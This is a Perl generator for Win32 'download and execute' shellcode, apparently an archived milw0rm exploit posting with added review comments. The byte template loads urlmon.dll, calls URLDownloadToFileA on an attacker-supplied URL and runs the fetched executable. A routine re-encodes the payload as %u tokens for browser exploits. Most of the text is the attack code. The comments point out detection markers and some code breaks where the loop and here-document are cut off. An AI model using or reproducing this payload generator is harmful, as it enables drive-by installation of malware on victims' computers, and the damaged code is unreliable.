Win32 Download and Execute Shellcode Generator (browsers edition) 270 bytes:
2008-03-14 win32 Download and Execute Shellcode Generator (browsers edition) 48697 R D YAG KOHHA
#!/usr/bin/perl
# Generator entry point: takes the URL of a remote executable as the first
# command-line argument and prints a banner containing the encoded payload.
# NOTE(review): there is no "use strict"/"use warnings"; $loading_url, $sco
# and $c are undeclared package globals.
$loading_url=$ARGV[0];
# With no argument this chomps undef; the empty-string test below still matches.
chomp ($loading_url);
# Filled in by buffer_gen() and printed afterwards.
my @buffer;
if ($loading_url eq "") {
# No URL supplied: route the error text through the same banner and stop.
$sco = 'ERROR!!! Enter url to remote exe.';
buffer_gen($sco);
print @buffer;
exit;
}
# generate_char(0) yields a single random lowercase letter (index range 0..0).
$c= generate_char(0);
# Payload template, concatenated from hex byte tokens. As shown on this page
# the tokens are plain "xNN" text (no escape backslashes are visible), so the
# string below is literal characters rather than raw bytes; this is likely an
# extraction artifact of the page.
#
# For analysts: the tokens near the end of the template decode to the ASCII
# strings "urlmon.dll" and "URLDownloadToFileA", and x2Ex2Ex5C decodes to
# "..\" placed in front of $c (twice), i.e. a one-letter file name relative
# to the parent of the working directory (presumably the download target;
# verify). The caller-supplied URL is appended unmodified, with no length or
# character check, and is followed by a x00 terminator.
# NOTE(review): xC1xCFx0D looks like the rotate-by-13 name-hash loop common in
# Win32 shellcode, which would make the pushed 32-bit constants API name
# hashes. Not verified here.
# The stable artifacts for detection are the two decoded strings, the "..\"
# path prefix and the %u-encoded output form produced by convert_sco().
$sco= "xE8x56x00x00x00x53x55x56x57x8Bx6Cx24x18x8Bx45".
"x3Cx8Bx54x05x78x01xEAx8Bx4Ax18x8Bx5Ax20x01xEB".
"xE3x32x49x8Bx34x8Bx01xEEx31xFFxFCx31xC0xACx38".
"xE0x74x07xC1xCFx0Dx01xC7xEBxF2x3Bx7Cx24x14x75".
"xE1x8Bx5Ax24x01xEBx66x8Bx0Cx4Bx8Bx5Ax1Cx01xEB".
"x8Bx04x8Bx01xE8xEBx02x31xC0x5Fx5Ex5Dx5BxC2x08".
"x00x5Ex6Ax30x59x64x8Bx19x8Bx5Bx0Cx8Bx5Bx1Cx8B".
"x1Bx8Bx5Bx08x53x68x8Ex4Ex0ExECxFFxD6x89xC7x53".
"x68x8Ex4Ex0ExECxFFxD6xEBx50x5Ax52xFFxD0x89xC2".
"x52x52x53x68xAAxFCx0Dx7CxFFxD6x5AxEBx4Dx59x51".
"x52xFFxD0xEBx72x5AxEBx5Bx59x6Ax00x6Ax00x51x52".
"x6Ax00xFFxD0x53x68xA0xD5xC9x4DxFFxD6x5Ax52xFF".
"xD0x53x68x98xFEx8Ax0ExFFxD6xEBx44x59x6Ax00x51".
"xFFxD0x53x68x7ExD8xE2x73xFFxD6x6Ax00xFFxD0xE8".
"xABxFFxFFxFFx75x72x6Cx6Dx6Fx6Ex2Ex64x6Cx6Cx00".
"xE8xAExFFxFFxFFx55x52x4Cx44x6Fx77x6Ex6Cx6Fx61".
"x64x54x6Fx46x69x6Cx65x41x00xE8xA0xFFxFFxFFx2E".
"x2Ex5C".$c."x00xE8xB7xFFxFFxFFx2Ex2Ex5C".$c."x00".
"xE8x89xFFxFFxFF".$loading_url."x00";
# Re-encode the template as %uXXXX tokens (default 'LE' mode), then wrap it
# in the banner and print it.
$sco=convert_sco($sco);
buffer_gen($sco);
print @buffer;
# Build a random string of lowercase ASCII letters.
#
# Reads one value from @_ and returns a string one character longer than
# that value, because the index range 0..N is inclusive; the script calls
# it with 0 and so gets a single letter.
# NOTE(review): the empty prototype "()" contradicts the argument read
# below; it goes unnoticed because the only call site is compiled before
# this definition is seen.
sub generate_char()
{
    my ($last_index) = @_;
    my @letters = ('a' .. 'z');
    my $word = '';
    for my $position (0 .. $last_index) {
        # One rand() draw per position, truncated to an array index.
        $word .= $letters[ int( rand(@letters) ) ];
    }
    return $word;
}
# Re-encode a string as a run of "%uXXXX" tokens, two input characters per
# token.
#
# Arguments: the data string, then an optional mode that defaults to 'LE'.
# Returns the concatenated token string.
# In 'LE' mode the second character of each pair is written first; any other
# mode writes the pair in input order.
# NOTE(review): "%uXXXX" is the escape form that JavaScript unescape()
# accepts, which matches the "browsers edition" title; long runs of it in
# page script are a common review and detection signal.
sub convert_sco {
my $data = shift;
my $mode = shift() || 'LE';
my $code = '';
my $idx = 0;
# Odd-length input is padded by repeating its final character so that every
# token has two characters to consume.
if (length($data) % 2 != 0) {
$data .= substr($data, -1, 1);
}
# NOTE(review): the loop condition is cut off on this page (everything after
# "$idx" is missing), so the block does not parse as shown.
while ($idx
my $c1 = ord(substr($data, $idx, 1));
my $c2 = ord(substr($data, $idx+1, 1));
# '%%u' emits a literal "%u"; each %.2x is a lowercase hex value padded to at
# least two digits.
if ($mode eq 'LE') {
$code .= sprintf('%%u%.2x%.2x', $c2, $c1);
} else {
$code .= sprintf('%%u%.2x%.2x', $c1, $c2);
}
$idx += 2;
}
return $code;
}
# Fill the file-level @buffer with a banner (title, size, author, usage,
# greetings) that carries the given text between the "Start" and "End"
# marker lines. Returns nothing useful; callers print @buffer afterwards.
# NOTE(review): declared with an empty prototype "()" yet reads one argument,
# and it overwrites the package global $sco rather than using a lexical.
# NOTE(review): the text after "@buffer=" looks like a here-document whose
# opening marker is missing on this page, with "FX" as its terminator; the
# block does not parse as shown.
sub buffer_gen(){
$sco = shift;
@buffer=
Win32 Download and Execute Shellcode Generator (browsers edition)
Size: 275 bytes + loading_url
Author: Yag Kohha (skyhole [at] gmail.com)
Usage: ./sco http://remote_server/loader.exe
Greetz to:
str0ke & milw0rm project
shinnai
h07
rgod
H.D. Moor & Metaspl0it
offtopic
3APA3A
-------> Start
$sco
-------> End
FX
}
# milw0rm.com [2008-03-14]